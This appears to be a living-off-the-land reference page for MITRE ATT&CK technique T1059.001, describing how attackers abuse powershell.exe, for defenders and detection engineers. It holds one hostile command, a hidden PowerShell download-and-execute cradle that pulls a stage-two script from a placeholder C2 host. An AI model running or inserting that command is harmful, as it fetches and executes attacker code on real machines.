T1059.001Tactic: ExecutionOfficial MITRE ATT&CK Page

T1059.001: PowerShell

Adversaries may abuse the PowerShell commands and scripting environment for executing commands, downloading payloads, and automating post-exploitation actions.

Total Capable Binaries: 1
Windows: 1
Linux: 0
macOS: 0

Living-off-the-Land Matrix for T1059.001

Across 1 verified binaries
Windows2 payloads

powershell.exe

PowerShell is a powerful task automation framework and scripting engine. Widely abused by threat actors for in-memory execution (fileless malware), credential dumping, remote command execution, and AMSI bypasses.

Sample Attack Vector:
powershell.exe -nop -w hidden -ep bypass -c "IEX ((New-Object Net.WebClient).DownloadString('http://c2.server/stage2.ps1'))"
Sharon Ben Moshe
Curated & Verified by
Sharon Ben Moshe
Cybersecurity Researcher & Detection EngineerCheck Point